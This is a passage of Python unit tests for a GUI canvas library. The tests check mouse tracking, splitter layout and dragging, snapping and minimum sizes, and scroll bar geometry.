        self.assertEqual(test_canvas_item1.mouse_pressed_pos, (160, 160))
        self.assertIsNone(test_canvas_item2.mouse_pressed_pos)
        canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
def test_mouse_tracking_after_drag_from_one_item_to_another(self):
    """After a press-move-release across items, mouse-inside tracking follows the cursor again."""
    ui = TestUI.UserInterface()
    modifiers = CanvasItem.KeyboardModifiers()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container_canvas_item = CanvasItem.CanvasItemComposition()
        container_canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        test_canvas_item1 = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item1.wants_mouse_events = True
        test_canvas_item1.wants_drag_events = True
        container_canvas_item.add_canvas_item(test_canvas_item1)
        canvas_item.add_canvas_item(container_canvas_item)
        test_canvas_item2 = TestCanvasItemClass.TestCanvasItem()
        test_canvas_item2.wants_mouse_events = True
        container_canvas_item.add_canvas_item(test_canvas_item2)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: moving across the row boundary hands tracking
        # from item 1 to item 2
        canvas_item.canvas_widget.on_mouse_entered()
        canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
        self.assertTrue(test_canvas_item1.mouse_inside)
        self.assertFalse(test_canvas_item2.mouse_inside)
        self.assertEqual(test_canvas_item1.mouse_pos, (160, 160))
        self.assertEqual(test_canvas_item2.mouse_pos, None)
        canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
        self.assertFalse(test_canvas_item1.mouse_inside)
        self.assertTrue(test_canvas_item2.mouse_inside)
        self.assertEqual(test_canvas_item1.mouse_pos, None)
        self.assertEqual(test_canvas_item2.mouse_pos, (160, 160)) # relative pos
        # now the drag. start in the right item, press mouse, move to left item
        # release mouse; press mouse again in left pane and verify it is in the left pane
        canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_pressed(480, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
        canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
        # check mouse tracking: the cursor ended over item 1, so item 1 is
        # inside again and item 2 has been cleared
        self.assertTrue(test_canvas_item1.mouse_inside)
        self.assertFalse(test_canvas_item2.mouse_inside)
        self.assertEqual(test_canvas_item1.mouse_pos, (160, 160))
        self.assertEqual(test_canvas_item2.mouse_pos, None)
def test_layout_splitter_within_splitter(self):
    # An outer splitter whose second pane holds another splitter; with no
    # explicit splits both default to halving their space, producing the
    # asserted rects.
    root = CanvasItem.CanvasItemComposition()
    splitter_outer = CanvasItem.SplitterCanvasItem()
    splitter_inner = CanvasItem.SplitterCanvasItem()
    outer_first = TestCanvasItem()
    inner_first = TestCanvasItem()
    inner_second = TestCanvasItem()
    splitter_inner.add_canvas_item(inner_first)
    splitter_inner.add_canvas_item(inner_second)
    splitter_outer.add_canvas_item(outer_first)
    splitter_outer.add_canvas_item(splitter_inner)
    root.add_canvas_item(splitter_outer)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    self.assertEqual(outer_first.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 480, 320))
    self.assertEqual(inner_first.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 480, 160))
    self.assertEqual(inner_second.canvas_rect, Geometry.IntRect.from_tlbr(0, 160, 480, 320))
def test_dragging_splitter_resizes_children(self):
    """Dragging the splitter handle from x=320 to x=480 moves the split from 0.5 to 0.75."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: default split is 50/50 (320/320 of 640)
        self.assertAlmostEqual(splitter.splits[0], 0.5)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
        # drag splitter from the 320 boundary to 480, then re-layout and
        # verify the panes resized to 480/160
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=480, y=240))
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        self.assertAlmostEqual(splitter.splits[0], 0.75)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=480, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=480, y=0), size=Geometry.IntSize(width=160, height=480)))
def test_setting_splitter_initial_values_results_in_correct_layout(self):
    # Splits assigned before layout must be honored: 40%/60% of 640 is
    # 256/384 pixels.
    root = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    first_pane = TestCanvasItem()
    second_pane = TestCanvasItem()
    splitter.add_canvas_item(first_pane)
    splitter.add_canvas_item(second_pane)
    splitter.splits = [0.4, 0.6]
    root.add_canvas_item(splitter)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    # check layout
    self.assertAlmostEqual(splitter.splits[0], 0.4)
    self.assertEqual(first_pane.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=256, height=480)))
    self.assertEqual(second_pane.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=256, y=0), size=Geometry.IntSize(width=640-256, height=480)))
def test_setting_splitter_values_after_adding_item_results_in_correct_layout(self):
    # Start with a single pane at 100%, lay out, then add a second pane and
    # reassign the splits to 40/60; after re-layout the panes must be 256
    # and 384 wide. (Layout is run twice after the change, as in the
    # original scenario this test preserves.)
    root = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    first_pane = TestCanvasItem()
    second_pane = TestCanvasItem()
    splitter.add_canvas_item(first_pane)
    splitter.splits = [1.0]
    root.add_canvas_item(splitter)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    splitter.add_canvas_item(second_pane)
    splitter.splits = [0.4, 0.6]
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    # check layout
    self.assertAlmostEqual(splitter.splits[0], 0.4)
    self.assertEqual(first_pane.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=256, height=480)))
    self.assertEqual(second_pane.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=256, y=0), size=Geometry.IntSize(width=640-256, height=480)))
def test_resizing_splitter_in_splitter_results_in_correct_layout(self):
    """A nested (horizontal-in-vertical) splitter should keep 50/50 splits after resize."""
    # setup canvas
    canvas_item = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    splitter_in = CanvasItem.SplitterCanvasItem("horizontal")
    canvas_item1 = TestCanvasItem()
    canvas_item2 = TestCanvasItem()
    canvas_item3 = TestCanvasItem()
    # inner splitter holds items 1 and 3 stacked; outer splitter puts the inner
    # splitter beside item 2
    splitter_in.add_canvas_item(canvas_item1)
    splitter_in.add_canvas_item(canvas_item3)
    splitter.add_canvas_item(splitter_in)
    splitter.add_canvas_item(canvas_item2)
    splitter_in.splits = [0.5, 0.5]
    splitter.splits = [0.5, 0.5]
    canvas_item.add_canvas_item(splitter)
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    # initial layout at 640x480: inner halves are 320x240 each
    self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=240)))
    self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
    self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=240), size=Geometry.IntSize(width=320, height=240)))
    # after resizing to 640x640 the 50/50 proportions must be preserved
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=640))
    self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=320)))
    self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=640)))
    self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=320), size=Geometry.IntSize(width=320, height=320)))
def test_splitters_within_splitter_result_in_correct_origins(self):
    """Children of nested splitters should get origins relative to their own splitter."""
    # setup canvas
    canvas_item = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    splitter_l = CanvasItem.SplitterCanvasItem("horizontal")
    splitter_r = CanvasItem.SplitterCanvasItem("horizontal")
    canvas_item1 = TestCanvasItem()
    canvas_item2 = TestCanvasItem()
    canvas_item3 = TestCanvasItem()
    canvas_item4 = TestCanvasItem()
    splitter_l.add_canvas_item(canvas_item1)
    splitter_l.add_canvas_item(canvas_item2)
    splitter_r.add_canvas_item(canvas_item3)
    splitter_r.add_canvas_item(canvas_item4)
    splitter.add_canvas_item(splitter_l)
    splitter.add_canvas_item(splitter_r)
    splitter_l.splits = [0.5, 0.5]
    splitter_r.splits = [0.5, 0.5]
    splitter.splits = [0.5, 0.5]
    canvas_item.add_canvas_item(splitter)
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=200, height=200))
    # items 3 and 4 live in the right-hand splitter, yet their rects begin at x=0:
    # canvas_rect is relative to the immediate container, not the root
    self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
    self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=100), size=Geometry.IntSize(width=100, height=100)))
    self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
    self.assertEqual(canvas_item4.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=100), size=Geometry.IntSize(width=100, height=100)))
def test_dragging_splitter_enforces_minimum_size(self):
    """Dragging a splitter bar past the edge must clamp the child to a minimum width."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: default split is 50/50
        self.assertAlmostEqual(splitter.splits[0], 0.5)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
        # drag splitter all the way to x=0; the left item is expected to clamp at
        # 64 px (the enforced minimum) rather than collapsing to zero
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=0, y=240))
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=64, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=64, y=0), size=Geometry.IntSize(width=576, height=480)))
def test_resizing_splitter_keeps_relative_sizes(self):
    """Resizing the container should scale both splitter children proportionally."""
    # build a splitter with two children under a composition
    root = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    first = TestCanvasItem()
    second = TestCanvasItem()
    for child in (first, second):
        splitter.add_canvas_item(child)
    root.add_canvas_item(splitter)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    # sanity: default split is half and half at 640 wide
    self.assertAlmostEqual(splitter.splits[0], 0.5)
    self.assertEqual(first.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
    self.assertEqual(second.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
    # widen to 720 and confirm each child now occupies 360
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=720, height=480))
    self.assertEqual(first.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=360, height=480)))
    self.assertEqual(second.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=360, y=0), size=Geometry.IntSize(width=360, height=480)))
def test_resizing_splitter_slowly_keeps_relative_sizes(self):
    """Many small resizes must not accumulate rounding drift in the split ratio."""
    # build a splitter with two children under a composition
    root = CanvasItem.CanvasItemComposition()
    splitter = CanvasItem.SplitterCanvasItem()
    first = TestCanvasItem()
    second = TestCanvasItem()
    for child in (first, second):
        splitter.add_canvas_item(child)
    root.add_canvas_item(splitter)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
    # sanity: default split is half and half at 640 wide
    self.assertAlmostEqual(splitter.splits[0], 0.5)
    self.assertEqual(first.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
    self.assertEqual(second.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
    # grow the width from 640 to 800 in 4-pixel steps; the final layout must be
    # exactly half of 800 on each side, proving no drift accumulated
    for width in range(640, 801, 4):
        root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=width, height=480))
    self.assertEqual(first.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=400, height=480)))
    self.assertEqual(second.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=400, y=0), size=Geometry.IntSize(width=400, height=480)))
def test_dragging_splitter_with_three_children_resizes_third_child(self):
    """Dragging the second splitter bar should trade space between children 2 and 3."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item3 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        splitter.add_canvas_item(canvas_item3)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: thirds of 640 are 213/213/214 (remainder to the last)
        self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
        self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
        # drag the bar between children 2 and 3 from x=426 to x=500; only those
        # two items should change — child 1 keeps its 213 width
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=426, y=240), Geometry.IntPoint(x=500, y=240))
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=500 - 213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=500, y=0), size=Geometry.IntSize(width=140, height=480)))
def test_dragging_splitter_with_three_children_resizes_third_child_after_second(self):
    """Two successive drags (first then second bar) should compose correctly."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item3 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        splitter.add_canvas_item(canvas_item3)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: thirds of 640 are 213/213/214
        self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
        self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
        # drag splitters; shift modifier is held — presumably to suppress snapping
        # during the drags (see the snap tests below) — TODO confirm
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=220, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=426, y=240), Geometry.IntPoint(x=500, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=220, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=220, y=0), size=Geometry.IntSize(width=500 - 220, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=500, y=0), size=Geometry.IntSize(width=140, height=480)))
def test_dragging_splitter_with_three_children_should_only_resize_the_two_items_involved(self):
    """Clamping a child at its minimum must not steal space from an uninvolved sibling."""
    # problem occurred when resizing to minimum; it pulled space from uninvolved item
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item3 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        splitter.add_canvas_item(canvas_item3)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: thirds of 640 are 213/213/214
        self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
        self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
        # drag the first bar to the far left: child 1 clamps at 64, child 2 absorbs
        # the difference, and child 3 must keep its original 214 width
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=0, y=240))
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=64, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=64, y=0), size=Geometry.IntSize(width=640 - 64 - 214, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=640 - 214, y=0), size=Geometry.IntSize(width=214, height=480)))
def test_dragging_splitter_with_three_children_snaps_to_thirds(self):
    """A drag ending near the one-third position should snap back exactly to thirds."""
    # problem occurred when resizing to minimum; it pulled space from uninvolved item
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        canvas_item3 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        splitter.add_canvas_item(canvas_item3)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: thirds of 640 are 213/213/214
        self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
        self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
        # drag splitter away (shift held — presumably disables snapping; TODO confirm),
        # then drag back to x=218, close enough to 213 that it should snap to thirds
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=213, y=240), Geometry.IntPoint(x=240, y=240), modifiers=CanvasItem.KeyboardModifiers(shift=True))
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=240, y=240), Geometry.IntPoint(x=218, y=240))
        self.assertAlmostEqual(splitter.splits[0], 213.0 / 640.0)
        self.assertAlmostEqual(splitter.splits[1], 213.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=213, y=0), size=Geometry.IntSize(width=213, height=480)))
        self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=426, y=0), size=Geometry.IntSize(width=214, height=480)))
def test_dragging_splitter_snaps_to_half(self):
    """A drag ending near the midpoint should snap the split exactly to one half."""
    # problem occurred when resizing to minimum; it pulled space from uninvolved item
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        splitter = CanvasItem.SplitterCanvasItem()
        canvas_item1 = TestCanvasItem()
        canvas_item2 = TestCanvasItem()
        splitter.add_canvas_item(canvas_item1)
        splitter.add_canvas_item(canvas_item2)
        canvas_item.add_canvas_item(splitter)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
        # check assumptions: default split is the midpoint
        self.assertAlmostEqual(splitter.splits[0], 320.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
        # drag splitter away to x=300 (far enough not to snap), then back to x=316,
        # which is close enough to the midpoint that it should snap to 320
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=300, y=240))
        self.assertAlmostEqual(splitter.splits[0], 300.0 / 640.0)
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=300, y=240), Geometry.IntPoint(x=316, y=240))
        self.assertAlmostEqual(splitter.splits[0], 320.0 / 640.0)
        self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
        self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
def test_scroll_area_content_gets_added_at_offset_zero(self):
    """Content placed into a scroll area should start with a zero canvas origin."""
    root = CanvasItem.CanvasItemComposition()
    # content is taller (1000) than the visible area (500) so scrolling applies
    tall_content = TestCanvasItem()
    tall_content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
    scroll_area = CanvasItem.ScrollAreaCanvasItem(tall_content)
    root.add_canvas_item(scroll_area)
    root.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
    # the content must not be pre-scrolled
    self.assertEqual(tall_content.canvas_origin, Geometry.IntPoint())
def test_scroll_bar_thumb_rect_disappears_when_visible_larger_than_content(self):
    """When everything fits on screen the scroll bar thumb should have zero height."""
    # setup canvas
    canvas_item = CanvasItem.CanvasItemComposition()
    canvas_item.layout = CanvasItem.CanvasItemRowLayout()
    content = TestCanvasItem()
    # content (100 tall) is smaller than the visible area (500 tall)
    content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=100))
    scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
    scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
    canvas_item.add_canvas_item(scroll_area)
    canvas_item.add_canvas_item(scroll_bar)
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
    # check assumptions: thumb height collapses to 0 since no scrolling is possible
    self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=100)))
    self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=0)))
def test_scroll_bar_can_adjust_full_range_of_content(self):
    """Dragging the thumb to the bottom should scroll the content to its far end."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        content = TestCanvasItem()
        # 1000-tall content in a 500-tall viewport: half is visible at a time
        content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
        scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
        scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
        canvas_item.add_canvas_item(scroll_area)
        canvas_item.add_canvas_item(scroll_bar)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
        # check assumptions: thumb is half the 500px track (visible/content ratio)
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
        # drag the thumb down as far as possible; content origin should become -500,
        # i.e. the bottom 500px of the content are shown
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=90, y=125), Geometry.IntPoint(x=90, y=500))
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
def test_scroll_bar_can_adjust_full_range_of_content_when_thumb_is_minimum_size(self):
    """Even with a minimum-size thumb, dragging must reach the full content range."""
    # setup canvas
